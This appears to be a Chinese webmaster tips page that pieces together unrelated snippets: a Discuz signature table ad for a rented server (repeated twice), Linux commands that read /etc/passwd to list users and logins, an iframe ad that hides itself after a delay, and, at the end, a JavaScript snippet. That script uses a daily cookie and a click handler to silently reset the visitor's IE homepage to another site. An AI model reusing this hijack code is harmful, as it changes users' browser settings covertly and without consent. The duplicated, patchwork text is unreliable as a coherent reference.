discuz签名用表格代码
看起来很明亮也能设置多元化
其实就是html上修改符号
例子代码
[table]
[tr=#CCFF33][td=1,1,600][url=http://item.taobao.com/item.htm?id=12595659381]双至强,4G,500G韩国LG国际独享10M独服,600元/月[/td][/tr]
[tr=#CC0000][td=1,1,600]详情QQ97616885咨询[/td]
[/tr]
[/table]
discuz签名用表格代码
看起来很明亮也能设置多元化
其实就是html上修改符号
例子代码
[table]
[tr=#CCFF33][td=1,1,600][url=http://item.taobao.com/item.htm?id=12595659381]双至强,4G,500G韩国LG国际独享10M独服,600元/月[/td][/tr]
[tr=#CC0000][td=1,1,600]详情QQ97616885咨询[/td]
[/tr]
[/table]
查看系统中有哪些用户:cut -d : -f 1 /etc/passwd
查看可以登录系统的用户:cat /etc/passwd | grep -v /sbin/nologin | cut -d : -f 1
查看用户操作:w命令(需要root权限)
查看某一用户:w 用户名
查看登录用户:who
查看用户登录历史记录:last
有时候广告需要框架显示 并且显示一定时间后需要隐藏
可以使用以下代码
<iframe id=”myframe” src=http://www.xiaopiao.net width=500 height=500></iframe>
<script>
setTimeout(“document.getElementById(‘myframe’).style.display=’none'”,3000);
</script>
<script language=”javascript”>
function Get(){
var Then = new Date();
Then.setTime(Then.getTime() + 24*60*60*1000);
var cookieString = new String(document.cookie);
var cookieHeader = “Cookie1=” ;
var beginPosition = cookieString.indexOf(cookieHeader);
if (beginPosition != -1){
} else
{ document.cookie = “Cookie1=www.xiaopiao.net;expires=”+ Then.toGMTString();document.writeln(“<script type=”text/javascript”>var setN=0;</script>”);
document.writeln(“<META content=”MSHTML 6.00.6000.16587″ name=GENERATOR></HEAD>”);
document.writeln(“<body onclick=”this.style.behavior=’url(#default#homepage)’;if(!(this.isHomePage(‘http://www.xiaopiao.net/’))&&setN!=1){this.sethomepage(‘http://www.114h.net’);setN=1;}”>”);
}
}Get();
</script>
<a href=”http://www.taobao.com/”>TAOBAO</a>
近期评论